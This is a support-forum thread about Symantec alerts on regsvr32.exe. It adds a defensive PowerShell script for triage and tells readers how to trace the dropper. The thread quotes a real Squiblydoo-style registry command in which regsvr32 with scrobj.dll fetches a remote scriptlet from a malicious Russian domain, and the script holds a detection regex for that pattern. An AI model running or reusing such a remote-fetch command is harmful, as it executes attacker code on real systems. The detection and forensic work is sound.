We are continuously seeing the alerts related to Downloader Dromedan attack activity blocked, and the culprit service is regsvr32.exe, which falls under the category of SONAR.SuspLaunch!g24 as reported by Symantec. Please assist as to what steps should be followed:
Are you under the impression this is a false positive? I would submit it to Symantec so they can review it.
Thanks for the response. I submitted the sample and, as per Symantec, the file regsvr32.exe is clean. I went through many articles online (https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/ and https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a DLL and then attempts to connect to a malicious URL, which is blocked by SEP.
The registry entry created is regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll.
I would like analysis and a clue as to where this entry got created in the registry, and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.
Can you help, please?
You'd need the initial dropper or malicious file that created it in order to analyze it.
Can we somehow check which was the dropper file, and whether the file is still present on the system?
Tough to say. You'll want to run a full forensic analysis on the system and try to correlate it with logs from your network devices, such as your firewall/IPS, to see how it got in. Ideally, if you had file integrity monitoring enabled for the system, it would make this easier.
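As an added example (not code from the thread, from Symantec, or from the linked articles), the host-side part of that forensic triage can be scripted. The command quoted earlier in the thread, regsvr32 with scrobj.dll and a remote http URL, is the well-known "Squiblydoo" launch; the script below looks for that pattern in the autostart locations a dropper typically writes to (Run/RunOnce keys, scheduled tasks, WMI event consumers), and then pulls process-creation events so the parent of regsvr32.exe (the dropper, or the Office process whose macro launched it) can be identified. It assumes an elevated PowerShell session on the affected host and that Sysmon is installed; if Sysmon is absent it falls back to Security event 4688, which only carries the command line when command-line auditing is enabled. The function names and the regex are mine, not anything the thread or Symantec names.

```powershell
# Added triage example, not code from the thread. Run elevated on the affected host.
# Matches regsvr32 + scrobj.dll + an http(s) URL in any order (covers both the
# "/u URL scrobj.dll" form quoted in the thread and the usual "/i:URL scrobj.dll" form).
$SquiblydooPattern = '(?i)^(?=.*regsvr32)(?=.*scrobj\.dll)(?=.*https?://)'

function Test-SquiblydooCommand {
    param([string]$CommandLine)
    return ($CommandLine -match $SquiblydooPattern)
}

function Find-SquiblydooPersistence {
    # 1. Registry Run/RunOnce keys (HKLM, HKCU and the WOW6432Node view).
    $runKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSProvider etc.
            if ($p.Value -is [string] -and (Test-SquiblydooCommand $p.Value)) {
                [pscustomobject]@{ Source = 'Registry'; Location = "$key\$($p.Name)"; CommandLine = $p.Value }
            }
        }
    }
    # 2. Scheduled tasks: each action is Execute + Arguments.
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if (Test-SquiblydooCommand $cmd) {
                [pscustomobject]@{ Source = 'ScheduledTask'; Location = "$($task.TaskPath)$($task.TaskName)"; CommandLine = $cmd }
            }
        }
    }
    # 3. WMI permanent event subscriptions (CommandLineEventConsumer).
    Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        Where-Object { Test-SquiblydooCommand $_.CommandLineTemplate } |
        ForEach-Object {
            [pscustomobject]@{ Source = 'WMI'; Location = $_.Name; CommandLine = $_.CommandLineTemplate }
        }
}

function Get-Regsvr32Launches {
    # Sysmon Event ID 1 (process creation) carries the parent image and parent command line.
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction SilentlyContinue
    $fromSysmon = $true
    if (-not $events) {
        # Fallback: Security 4688. CommandLine is only present when
        # "Include command line in process creation events" is enabled.
        $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue
        $fromSysmon = $false
    }
    foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $cmd = $d['CommandLine']
        if (-not $cmd -or -not (Test-SquiblydooCommand $cmd)) { continue }
        if ($fromSysmon) {
            $user = $d['User']; $parent = $d['ParentImage']; $parentCmd = $d['ParentCommandLine']
        } else {
            $user = $d['SubjectUserName']; $parent = $d['ParentProcessName']; $parentCmd = '(not logged by 4688)'
        }
        [pscustomobject]@{
            Time          = $e.TimeCreated
            User          = $user
            CommandLine   = $cmd
            ParentImage   = $parent
            ParentCommand = $parentCmd
        }
    }
}

# Usage: first see where the launch is stored, then which process launched it.
Find-SquiblydooPersistence | Format-List
Get-Regsvr32Launches | Sort-Object Time | Format-List
```

The ParentImage of the earliest matching launch is the lead to follow: if it is an Office binary, the dropper is a document with a macro and the file path should be in the parent command line; if it is an installer or an unknown executable, that is the dropper to recover (or to confirm was deleted). Registry key last-write times are not exposed by Get-ItemProperty, so to date when the Run value was written, export the hive and use a registry forensics tool, then correlate that timestamp with the firewall/IPS logs mentioned above.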
The problem persists, and the Symantec team has not taken up the task of solving the problem.